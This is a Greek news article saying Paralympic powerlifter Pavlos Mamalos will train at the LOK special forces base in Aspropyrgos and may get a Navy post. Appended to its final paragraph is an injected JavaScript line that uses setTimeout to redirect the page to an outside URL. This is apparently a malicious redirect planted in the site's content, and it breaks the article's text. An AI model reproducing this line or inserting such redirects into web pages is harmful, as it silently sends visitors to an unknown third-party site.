Στους Λοκατζήδες θα προπονείται ο Μάμαλος

0
14

 

Στους Λοκατζήδες θα προπονείται σε λίγες εβδομάδες ο Παύλος Μάμαλος, σύμφωνα με πληροφορίες που επικαλείται το Αθηναϊκό Πρακτορέιο, με πρωτοβουλία του υπουργού Εθνικής Άμυνας, Πάνου Καμμένου.

Ο «χρυσός» Παραολυμπιονίκης του Ρίο θα «μετακομίσει» στον ειδικό χώρο όπου εδρεύουν τα ΛΟΚ στην περιοχή του Ασπροπύργου για τις προπονήσεις του, για τις ανάγκες των οποίων θα του διατεθεί χώρος περίπου 110 τετραγωνικών μέτρων, όπου βρίσκονται ήδη εγκατεστημένα όργανα γυμναστικής.

Στον χώρο αυτό θα τοποθετηθούν και οι πάγκοι της άρσης βαρών του Έλληνα Παραολυμπιονίκη, ο οποίος θα πραγματοποιεί τις προπονήσεις του παρουσία και των λοκατζήδων!

Σύμφωνα πάντα με τις ίδιες πληροφορίες από το υπουργείο Εθνικής Άμυνας, στον Παύλο Μάμαλο θα δοθεί ειδική άδεια, ώστε να είναι εύκολη η πρόσβασή του στην Μονάδα ανά πάσα στιγμή για προπονήσεις, οι οποίες σε λίγες εβδομάδες θα γίνουν πιο εντατικές, αφού υπάρχουν πολλές και σημαντικές διοργανώσεις στην άρση βαρών σε πάγκο μέσα στο 2017.

Μάλιστα, γίνονται προσπάθειες ώστε ο Παύλος Μάμαλος να καταλάβει θέση υπαλλήλου στο Πολεμικό Ναυτικό, με δεδομένο ότι ο «αγαθός γίγαντας» από το 2004 δικαιούται μια τέτοια θέση δημοσίου λόγω των πολλών και σημαντικών διακρίσεών του, με αποκορύφωμα το χρυσό μετάλλιο στο Ρίο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here